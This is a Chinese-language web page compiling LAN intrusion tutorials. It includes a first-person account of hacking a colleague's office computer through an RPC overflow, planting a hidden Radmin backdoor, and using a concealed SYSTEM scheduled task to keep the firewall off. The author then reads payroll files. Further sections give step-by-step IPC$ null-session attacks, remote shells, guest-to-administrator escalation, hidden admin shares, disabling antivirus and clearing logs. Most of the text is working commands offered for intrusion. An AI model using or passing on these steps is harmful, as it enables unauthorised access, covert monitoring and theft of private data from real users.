局域網入侵教程_求問局域網電腦入侵的問題 _生活經驗

局域網簡單入侵步驟事先聲明，本人不是黑客，不懂高深的計算機知識。

三步驟：

一、到要入侵的電腦上(假設IP：192.168.0.100)，右擊我的電腦--遠程--允許用戶遠程連接到此計算機打勾。如果不懂得超級管理員權限，就去新建個帳戶。

二、在你自己的電腦上，打開cmd ，輸入:mstsc，跳出遠程桌面，輸入192.168.0.100 。進入之后，要求輸入正確的用戶名密碼，你就把剛剛建的帳戶輸入，或者你本來就已經知道超級管理員的權限，也可以輸入。

三、進去之后，你可以寫上某某到此一游。或者直接點開始--關機。于是......

請
局域網入侵命令僅供參考
我先打開命令提示符，用 ping 命令去ping 它， Reply from 192.168.16.4: bytes=32 time<1ms TTL=128，說明對方沒有防火墻，這樣或許有可能入侵。下一步，我使用了X-SCAN 3.2對它進行了詳細掃描,對方電腦的操作系統是XP ，大家知道XP系統是相當安全的，在一些黑客論壇討論的關于入侵XP的話題也是比較多的，入侵這樣的系統方法只有兩種，一是采用釣魚的方法，這是一種被動的方式讓對方中木馬來控制它。第二種方法就是如果對方有比較嚴重的漏洞，如RPC溢出。這樣的話，用溢出程序溢出它，然后再上傳控制程序進行控制。掃描結果確實讓我高興了一陣,對方電腦有大量的漏洞,其中一個比較有名的就是沖擊波利用的RPC漏洞,這個漏洞相當出名了,03年的時候曾席卷全球。知道了它有這個漏洞，下一步就要找溢出程序，這讓我忙活了好一陣時間，因為有的溢出程序對這臺電腦好像無效。這些工具的名稱我都記不起來了，反正有好幾個。最后找到了一個溢出程序XP.EXE ，這個程序終于溢出了那臺電腦。得到了個CMDSHELL 。這算是一個小小的勝利吧。
得到了CMDSHELL ，我該怎樣給它上傳控制程序呢？我想了一會兒，終于靈感來了，我和它在一個局域網，用共享上傳最方便了。于是打開網上鄰居，查看工作組計算機，找到這臺電腦，雙擊，進不去，提示信息我記不清了，據我分析可能是對方這臺電腦沒有運行網絡安裝向導，因為是XP系統，所以要用共享傳輸文件，必須要運行這個向導不可，運行這個向導作用就是配置一個本地安全策略，你可以打開“控制面板—管理工具—本地安全策略”，展開“本地策略”—“用戶權利指派” 。在右邊有一個安全策略—“拒絕從網絡訪問這臺計算機” 。我想對方的電腦中相應的這條策略里，肯定設置有GUEST這個用戶的，這就是為什么我打不開它的共享的原因，因為共享訪問默認是以這個GEUST用戶登錄的，因為它的安全設置不允許GUEST從網絡訪問，所以我才訪問不了它的共享。因為XP 默認的共享模式是簡單文件共享。這與WIN2000系統不同，如果是WIN2000系統，你在知道管理員密碼的情況下，可以用命令net use IPipc$ "密碼" /user:用戶名建立與對方的ipc$連接，隨之而來的就是copy 木馬程序 ipd$這樣的命令上傳木馬了。XP就不能這樣子了，你即使知道它的管理員密碼用上面的命令與不能建立ipc$連接。這就是為什么XP比2000系統安全的地方所在。下面我要作的就是要修改XP的共享模式為2000的共享模式。方法如下：在溢出獲得的CMDSHELL下，鍵入命令：
echo Windows Registry Editor Version 5.00 >c:123.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>c:123.reg
echo. >>c:123.reg
echo "forceguest"=dword:00000000 >>c:123.reg
regedit /e c:123.reg
等打完這幾條命令后，對方XP的共享模式就已經與2000的相同了。我來解釋一下這幾條命令的含意， echo Windows Registry Editor Version 5.00 >c:123.reg這條命令是將Windows Registry Editor Version 5.00這幾個字符保存到c:123.reg文件里。大家需要注意一下第一句的> 和后面幾句的>>這是有區別的，>字符是覆蓋式的，>>是追加式的，第三句的echo. >>c:123.reg命令是追加一個空白行，這句挺重要，如果不加這句是不能成功的，你可以隨便打開一個注冊表文件看一下，格式就是這樣的，第二行是空著的。這一點一定要注意。執行完前四條命令后就在對方C盤下生成一個123.reg文件，內容如下：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
第五條命令是將這個REG文件導入到注冊表中。這樣執行完這五條命令后，我就可以像操作2000系統一樣去用ipc$控制了。下一步，上傳控制程序。我選擇的是RADMIN2.0的服務程序，有人問這個安裝需要到圖形界面下，我說不用這么費事，在CMDSHELL下一樣可以安裝。安裝前我們需要先準備一下，首先生成一個REG文件，文件名：aaa.reg 內容如下：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters]
"DisableTrayIcon"=hex:01,00,00,00
作用就是使生成的服務端程序能夠隱藏通知欄里的圖標，我們都知道正常安裝RADMIN服務端程序后，在通知欄里是有一個小圖標的，我們要入侵人家，當然要把這個小圖標去掉，不然是會被發現的。接著生成一個BAT文件，我命名為aaa.bat，內容如下：
r_server /install /silence
r_server.exe /port:2233 /pass:1 /save /silence
regedit.exe /s aaa.reg
net start r_server
這些命令是安裝命令，設置連接端口為：2233 密碼是：1 隱藏安裝界面的方式安裝然后就是將aaa.reg導入注冊表，啟動r_server服務。
準備工作作好后，就要上傳文件了，一共需上傳4個文件，aaa.reg aaa.bat r_server.exe admdll.dll 后兩個文件是RADMIN安裝目錄下的，在安裝了RADMIN2.0客戶端后，安裝目錄里就有這兩個文件。我先建立ipc$連接 net use 192.168.16.4ipc$ "" /user:administrator 提示：命令成功完成。接著:
copy r_server 192.168.1.4admin$system32
copy aaa.bat 192.168.1.4admin$system32
copy aaa.reg 192.168.1.4admin$system32
copy admdll.dll 192.168.1.4admin$system32
然后再進入溢出得到的CMDSHELL下鍵入：
attrib +s +h +r c:windowssystem32r_server.exe
attrib +s +h +r c:windowssystem32admdll.exe
attrib +s +h +r c:windowssystem32aaa.bat
attrib +s +h +r c:windowssystem32aaa.reg
這些命令是將這4個文件設置成系統隱藏只讀文件，不容易被對方管理員發現。
下一步就是運行aaa.bat了，就這么簡單，運行成功后，我用radmin2.0客戶端設置了一下連接參數，端口改成2233，連接成功，密碼是1 ，成功地看到了對方的屏幕。呵呵，成功了，從有入侵的想法到入侵成功進行控制，只用了短短的4天時間。
進入后看到對方電腦上正在玩QQ保皇游戲，不過我也犯了個錯誤我給它新建了個管理用戶，原先是打算用于ipc$連接用的，可我上傳RADMIN控制后忘記刪掉了，我在溢出的CMDSHELL 下不小心鍵入了命令EXIT ，結果對方電腦出現了倒計時關機的界面，我也沒有及時處理掉，我當時要是用RADMIN的CMD功能，鍵入命令 shutdown -A就可以取消這個倒計時關機的界面，可當時我也沒有及時處理，導致對方電腦重啟了，重啟后我估計對方管理員看到了我新建的用戶了，后來我用RADMIN 遠程查看時，也覺得這個新建用戶太招搖了，用戶名就是ip$ ,圖標是個大紅的花朵。
下午的時候我發現那臺電腦的管理員請了位高手來助陣了，因為我們這個局域網中的各臺電腦都通過我們辦公室里的那臺電腦連接到互聯網上，所以，那位高手先到我們辦公室電腦上查看了一番沒有發現問題后，他將原先安裝的江民換成了卡巴了，我估計他認為攻擊是來自互聯網上，豈不知黑客就在他眼皮底下，嘿嘿。。。。那位高手又給被我控制了的電腦上安裝了卡巴，原先的殺毒軟件是諾頓，對WINDOWS也進行了更新，可這些作法都晚了，因為我已經控制你了,再打補丁也無用了。經過那位高手一番檢查與修補后，我的后門依然存在著，看來那位高手水平也不怎么樣。我給它開放的ipc$功能，他也沒發現。也許他只認為是一次簡單的病毒攻擊，而掉以輕心了，而不知他的一舉一動都在我的監視之下。哈哈。。。
接下來的工作對我來說就比較簡單了，給它開telnet服務器，開“遠程桌面”這個我采用的是圖形的方式進行操作的，中午下班后我等這臺計算機管理員走后，用RADMIN登錄進去進行了一些設置工作。后來也通過RADMIN的文件管理功能翻看了這臺電腦上的文件，有一些財務報表，工資表之類的東西，這些對我來看沒什么大的吸引力。不過我看到了我們集團老總的工資，每月一萬多塊錢呢?。『煤詘?。。。這么多，我工資只有區區幾百塊，真是太不公平了，憤憤不平中。。。。
后來一次通過RADMIN操作對方的電腦時不小心被管理員發現了，我想對方的管理員也很感到意外， windows的補丁打上了，還裝了強悍的卡巴，還是搞不定黑客?。」? ，因為卡巴不是殺RADMIN的。后來對方那個管理員啟用了局域網“本地連接”中的防火墻功能，這樣我無法連接它的電腦了。因為RADMIN是正向連接的，所以在對方開防火墻的情況下是無法使用的。有一次下午下班后我無意地ping 了一下這臺電腦的IP，居然有返回。說明對方防火墻關閉了，我馬上用RADMIN連接，居然成功。我暈。。。原來對方只開了防火墻，并沒有發現這個明顯的后門。我想開防火墻也是那位電腦高手給搞的，依那個管理員的水平是想不到這個辦法的。不過telnet服務器給關閉了，3389遠程桌面也給關了，共享模式也被修改回了原先的樣子。看來那位高手也是發現了一些漏洞并補上了，但是那個后門，他卻沒有發現，這就給我創造了第二次入侵的機會。他有政策我有對策，他可以開防火墻，我可以給他關掉，有人問要是再被管理員開啟了防火墻，那豈不是沒得玩了。哈哈。。。我下面給出一個我自己研究出來的獨門密方，保證百?。」?。。。。
我的方法是創建一個隱藏的計劃任務。讓這個計劃任務每隔半個小時殺除一遍防火墻，這樣即使對方管理員打開防火墻也起不了什么作用。方法如下：先建一個批處理文件abc.bat ，放在c:windowssystem32目錄下,內容如下：
net stop sharedaccess
當然也可以附加點別的，比如說你想半小時殺除一遍天網防火墻，可以再加上下面的命令：
taskkill /IM rfw.exe /f
如果想使共享模式是高級共享模式，可以再加上下面的命令：
regedit /e c:windowssystem32abc.reg
當然這需要事先上傳一個abc.reg到它的c:windowssystem32目錄下，內容如下：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
"forceguest"=dword:00000000
下面我說一下創建隱藏計劃任務的方法：
在對方電腦的CMDSHELL下鍵入命令：
schtasks /create /tn "常駐" /tr c:windowssystem32abc.bat /sc minute /mo 30 /ru "system"
這樣就在對方電腦上建立了一個以SYSTEM權限運行的計劃任務，這個計劃任務每隔30分鐘運行一次c: windowssystem32abc.bat,功能嘛，就是根據abc.bat里面的命令行決定了，可以說這個新發現是相當厲害的，利用的巧妙，功能可以相當強大。如果只有這樣還不能達到隱藏的要求，你打開控制面板—任務計劃，仍然可以發現它的存在。好的，下面說說隱藏它的方法。還是進入 CMDSHELL中。鍵入命令attrib +h c:windowstasks常駐.job回車后，你再到控制面板的任務計劃中看一下是不是以前的任務消失了。這只是表面消失，實際是它還是存在的。你可以在CMDSHELL下鍵入命令：schtasks查看。這樣不管對方管理員怎樣修改設置，每隔半小時就又會補修改回來。它想擺脫我的控制可說是難上加難了。哈哈。。。
如何入侵局域網中的鄰居家電腦那就不叫入侵?。?br />
方法:
－獲悉對方IP地址
－DOS窗口輸入 TRACERT （對方IP地址）
－DOS窗口輸入 NBTSTAT -A（對方IP地址）
第一行是對方電腦名稱
第二行是對方電腦所在工作組
第三行是對方電腦的說明
－將Windows目錄下LMHOSTS.SAM－改名為LMHOSTS－刪除內容－將對方的IP及電腦名按以下格式寫入文件：（對方IP地址）電腦名
－DOS窗口輸入 NBTSTAT -R
－開始-查找-電腦－輸入對方電腦名
－出現對方電腦點擊即可進入
或者可以利用一些端口進入！
如何能局域網入侵別人的計算機相關命令
建立空連接
net use [url= "" /user:"" (一定要注意:這一行命令中包含了3個空格)
建立非空連接
net use [url= "用戶名" /user:"密碼" (同樣有3個空格)
映射默認共享
net use z: [url= "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤，其他盤類推)
如果已經和目標建立了ipc$，則可以直接用IP+盤符+$訪問,具體命令 net use z: [url=
刪除一個ipc$連接
net use [url= /del
刪除共享映射
net use c: /del 刪除映射的c盤，其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
經典入侵模式
1.C:\>net use [url= "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators，密碼為"空"的IP地址(空口令?哇,運氣好到家了)，如果是打算攻擊的話，就可以用這樣的命令來與127.0.0.1建立一個連接，因為密碼為"空"，所以第一個引號處就不用輸入，后面一個雙引號里的是用戶名，輸入administrators，命令即可成功完成。
2. C:\>copy srv.exe [url=
先復制srv.exe上去，在流光的Tools目錄下就有（這里的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要復制到什么地方去了）。
3.C:\>net time [url=
查查時間，發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00，命令成功完成。
4.C:\>at [url= 11:05 srv.exe
用at命令啟動srv.exe吧（這里設置的時間要比主機時間快，不然你怎么啟動?。嗆牽。?
5.C:\>net time [url=
再查查到時間沒有？如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05，那就準備開始下面的命令。
6.C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧，注意端口是99 。Telnet默認的是23端口，但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell 。
雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet服務！這就要用到ntlm了
7.C:\>copy ntlm.exe [url=
用Copy命令把ntlm.exe上傳到主機上（ntlm.exe也是在《流光》的Tools目錄中）。
8.C:\WINNT\system32>ntlm
輸入ntlm啟動（這里的C:\WINNT\system32>指的是對方計算機，運行ntlm其實是讓這個程序在對方計算機上運行）。當出現"DONE"的時候，就說明已經啟動正常。然后使用"net start telnet"來開啟Telnet服務！
9.Telnet 127.0.0.1 ，接著輸入用戶名與密碼就進入對方了，操作就像在DOS上操作一樣簡單！(然后你想做什么?想做什么就做什么吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10.C:\>net user guest /active:yes
將對方的Guest用戶激活
11.C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12.C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改，guest帳號沒改變的話，下次我們可以用guest再次訪問這臺計算機)
ipc$與空連接,139,445端口,默認共享的關系
怎么入侵局域網的電腦？教你一個CMD入侵 IPC$入侵
利用ipc$入侵的相關命令：
我們在入侵的時候難免遇到忘記命令的時候，現在將我所知道的一些命令總結出來提供給各位。通過這些命令可以解決很大一部分新手的問題。
00:net use
作用：連接計算機或斷開計算機與共享資源的連接，或顯示計算機的連接信息。
命令格式：
net use [devicename | *] [\\\\computername\\sharename[\\volume]] [password | *]] [/user:[domainname\\]username] [[/delete] | [/persistent:{yes | no}]]
參數介紹：
(1)鍵入不帶參數的net use列出網絡連接。
(2)devicename指定要連接到的資源名稱或要斷開的設備名稱。
(3)\\\\computername\\sharename服務器及共享資源的名稱。
(4)password訪問共享資源的密碼。
(5)*提示鍵入密碼。
(6)/user指定進行連接的另外一個用戶。
(7)domainname指定另一個域。
(8)username指定登錄的用戶名。
(9)/home將用戶連接到其宿主目錄。
(10)/delete取消指定網絡連接。
(11)/persistent控制永久網絡連接的使用。
01: net use \\\\X.X.X.X\\ipc$ \"\" /user:\"\" 建立空連接
02: net use \\\\X.X.X.X\\ipc$ \"密碼\" /user:\"用戶名\" 建立非空連接
03: net use \\\\X.X.X.X\\ipc$ /del 刪除連接
04: net time \\\\X.X.X.X
作用：使計算機的時鐘與另一臺計算機或域的時間同步。
命令格式：net time [\\\\computername | /domain[:name]] [/set]
參數介紹：
(1)\\\\computername要檢查或同步的服務器名。
(2)/domain[:name]指定要與其時間同步的域。
(3)/set使本計算機時鐘與指定計算機或域的時鐘同步。
05: net view \\\\X.X.X.X
作用：顯示域列表、計算機列表或指定計算機的共享資源列表。
命令格式：net view [\\\\computername | /domain[:domainname]]
參數介紹：
(1)鍵入不帶參數的net view顯示當前域的計算機列表。
(2)\\\\computername 指定要查看其共享資源的計算機。
(3)/domain[:domainname]指定要查看其可用計算機的域。
06: net use X: \\\\X.X.X.X\\Y 將共享名為Y的共享資源映射為本地X盤
07: net use X: /del 刪除映射的X盤
08: net share
作用：創建、刪除或顯示共享資源。
命令格式：net share share name=drive:path [/users:number | /unlimited] [/remark:\"text\"]
參數介紹：(1)鍵入不帶參數的net share顯示本地計算機上所有共享資源的信息。(2)sharename是共享資源的網絡名稱。
(3)drive:path指定共享目錄的絕對路徑。
(4)/users:number設置可同時訪問共享資源的最大用戶數。
(5)/unlimited不限制同時訪問共享資源的用戶數。
(6)/remark:\"text \"添加關于資源的注釋，注釋文字用引號引住。
09: net user
作用：添加或更改用戶帳號或顯示用戶帳號信息。
該命令也可以寫為 net users
命令格式：net user [username [password | *] [options]] [/domain]
參數介紹：(1)鍵入不帶參數的net user查看計算機上的用戶帳號列表。
(2)username添加、刪除、更改或查看用戶帳號名。
(3)password為用戶帳號分配或更改密碼。
(4)*提示輸入密碼。
(5)/domain在計算機主域的主域控制器中執行操作。
10: net start 作用：啟動服務，或顯示已啟動服務的列表。
11: net pause 作用：暫停正在運行的服務。
12: net Continue 作用：重新激活掛起的服務。
13: net stop
還可以利用工具，如ATOOL ，流光。。。
可以和我交流哦
求問局域網電腦入侵的問題【局域網入侵教程_求問局域網電腦入侵的問題】先申明：
1.入侵的范圍只包括局域網，如果在學校上，可以入侵整個校園網;
2.能入侵的只是存在弱口令(用戶名為administrator等,密碼為空)，并且開了***端口，但沒開防火墻的機子。
入侵工具：
一般要用到三個：NTscan**掃描器，Recton--D賀免殺專用版，DameWare迷你中文版 4.5. (前兩個工具殺毒軟件都會報毒，建議將殺毒軟件實時防毒暫時關掉，并將這兩個軟件的壓縮包加密，防止被殺。)
入侵步驟：
1.使用"NTscan**掃描器" ，在IP處填上要掃描的IP范圍，選擇"WMI掃描"方式，按"開始"后就等掃描結果了。
2.使用"Recton--D賀免殺專用版"
選擇"CMD命令"項，在"CMD:"中輸入"net share C$=C:\"，即可開啟遠程主機的C盤共享，以此將"C"換成D,E,F等，即可開啟D盤，E盤，F盤等的共享，這種共享方式隱蔽性很高，而且是完全共享，在對方主機上不會出現一只手托住盤的共享標志，然后在地址欄中輸入"\\對方IP\C$"，即可進入對方C盤。
選擇"Telnet"項，在"遠程主機"中輸入剛才掃描到的一個IP，遠程啟動Telnet服務，成功后在"CMD選項"中，執行命令："net share ipc$",接著執行："net share admin$",最后執行"net use \\***.***.***.***\IPC$" /user：administrator"在*處填入你入侵的主機IP 。
3.使用"DameWare迷你中文版 4.5"，安裝后點"DameWare Mini Remote Control"，在"幫助"項中選擇激活產品，輸入注冊信息，成功注冊后，進入"遠程連接"窗口，在"主機"處填入IP地址，點"設置"，在"服務安裝選項"中點"編輯"后,在"通知對話框"中去掉"連接時通知",在"附加設置"中全都不選，在"用戶選項"中去掉"啟用用戶選項菜單" 。設置完成好后，就可點"連接" ，在彈出的對話框中點"確定"后，成功后你就可以像操作自己機子一樣控制別人電腦了，當然你也可以只選擇監視對方屏幕。注意：如果不注冊的話，在對方主機上會彈出一個對話框，暴露你的身份。
入侵步驟補充：
1.在以上第2步中，遠程啟動Telnet服務可以通過"我的電腦-管理-連接到另一臺計算機-輸入IP-服務和應用程序-服務-將telnet改為手動-啟動"完成。
2.Recton-D賀免殺專用版還有其他功能，在"進程"項中，可以查看遠程主機的進程，并可任意結束其中進程;在"共享"項中，可以創建共享，我常用的是創建C$,D$,E$,F$,共享路徑分別對應C：\,D：\等，共享好后在地址欄中輸入\\IP\C$,進入對方C盤，你就可以隨意復制刪除里面的東西了，而且這種共享對方機子盤符上不會顯示共享圖標，也就不會被發現，弄完后最好還是把共享給關掉。最后選"日志"，清除所有日志，不留痕跡。這個軟件會被殺毒軟件當作病毒殺掉，用它時須將實時防毒關掉。
3.上面的共享可通過CMD(程序-附件-命令提示符)完成，首先"telnet IP",telnet上去,鍵入y后輸入的用戶名"administrator",密碼為空, 進入后，開共享用net share命令，共享C$(即C盤)："net share C$=C：",共享system文件夾："net share c=c：\winnt\system32",共享IPC$用："net share IPC$"等,最后是關閉共享，關閉C盤共享："net share C$ /del" 。
4.為方便下次入侵，可以設置后門，查看用戶："net user",激活guest用戶
"net user guest /active：yes",更改guest的密碼為poco："net user guest poco",把guest的權限提升為管理員權限："net localgroup administrators guest /add" 。
5.telnet命令(DOS命令)很多，可去網上查找它的命令，常用的有：查看D盤文件：""dir d：\",查看C盤program file文件夾："dir c：\PROGRA~1\;",60秒倒記時關機："shutdown -s -t 60"
補充說明：
1.net use錯誤原因解決：
(1)."發生系統錯誤 ***6 。登錄失敗：未知的用戶名或錯誤密碼。"
在遠程機的"控制面板-文件夾選項-查看-簡單的文件共享",去掉選取,然后再嘗試連接。簡單文件共享會把網絡連接權限都歸為 guest連接，是無法訪問C$等管理共享的.
(2)"發生系統錯誤 ***7 。登陸失敗：用戶帳戶** 。可能的原因包括不允許空密碼，登陸時間**，或強制的策略限。"在遠程機的"控制面板-管理工具-本地安全策略-安全選項-用戶權限"指派里，禁用"空密碼用戶只能進行控制臺登陸".
(3)"//IP/c$"時提示找不到網絡途徑。在"網絡和撥號連接"中"本地連接"中選取"Internet協議(TCP/IP)"屬性，進入"高級TCP/IP設置"選"WINS設置"里面有一項"啟用TCP/IP的NETBIOS".